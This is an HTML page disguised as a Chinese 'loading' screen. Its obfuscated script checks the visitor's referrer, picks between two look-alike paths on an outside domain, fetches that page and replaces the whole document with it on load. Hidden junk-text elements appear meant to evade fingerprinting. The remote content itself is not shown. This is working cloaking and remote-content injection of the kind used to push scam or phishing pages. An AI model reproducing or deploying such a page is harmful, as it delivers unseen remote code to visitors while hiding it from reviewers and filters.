<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .lYKU6M {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .lYKU6M .ijnfDZ {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .lYKU6M .content {
            line-height: 50px;
            text-align: center
        }

        .lYKU6M .img {
            width: 100%
        }

        .lYKU6M .TRNQpU {
            text-align: center
        }

        .lYKU6M .TRNQpU span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .lYKU6M .TRNQpU span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .lYKU6M .TRNQpU span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .lYKU6M .TRNQpU span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .lYKU6M .TRNQpU span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .lYKU6M .TRNQpU span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .lYKU6M .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function eptEAhUP2PLqU(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var L1Go6M = eptEAhUP2PLqU('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ L1Go6M +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ L1Go6M +".html?a=share";
		}
		
        yaYK4Mnq4s=url+"#"+new Date().getTime();
        yaYK4Mnq4s && function() {
            $.get(yaYK4Mnq4s, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<h1 style='display:none' >CZkSNvXysM2O86u14lEjucKyaCYo7Xx2cNZbTjs8U4mU5TddWP8</h1>
<b style='display:none' >JlnQrXm0giiS8BMmyw6GmVHbTpqCZuvT3V8Uv1TRuUaZIvXGKUpyBhqpfwPxuNOcWfvNMh</b>
<b style='display:none' >JlnQrXm0giiS8BMmyw6GmVHbTpqCZuvT3V8Uv1TRuUaZIvXGKUpyBhqpfwPxuNOcWfvNMh</b><div class="lYKU6M">
    <div class="ijnfDZ">
        <div class="TRNQpU">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>EtI2ex98GNvHgfx6OPYct14eqPJ69zSODZeAQLJer8Xhrn5xRAhR</div>
<ul style='display:none' >bq55PesGc4A</ul>
<div style='display:none'>EtI2ex98GNvHgfx6OPYct14eqPJ69zSODZeAQLJer8Xhrn5xRAhR</div>
<span style='display:none'>UgsrGLziM1OHqzMyzKm48kJaiECDNRqBLvY</span>
<ul style='display:none' >bq55PesGc4A</ul>
<b style='display:none' >OblfzibdvPOhd0hllGhA0ti0TLY5eq8asMdtSeDIxQ8DekiUChfA5soXYbpv3TKGilN9Pd</b></body>
</html>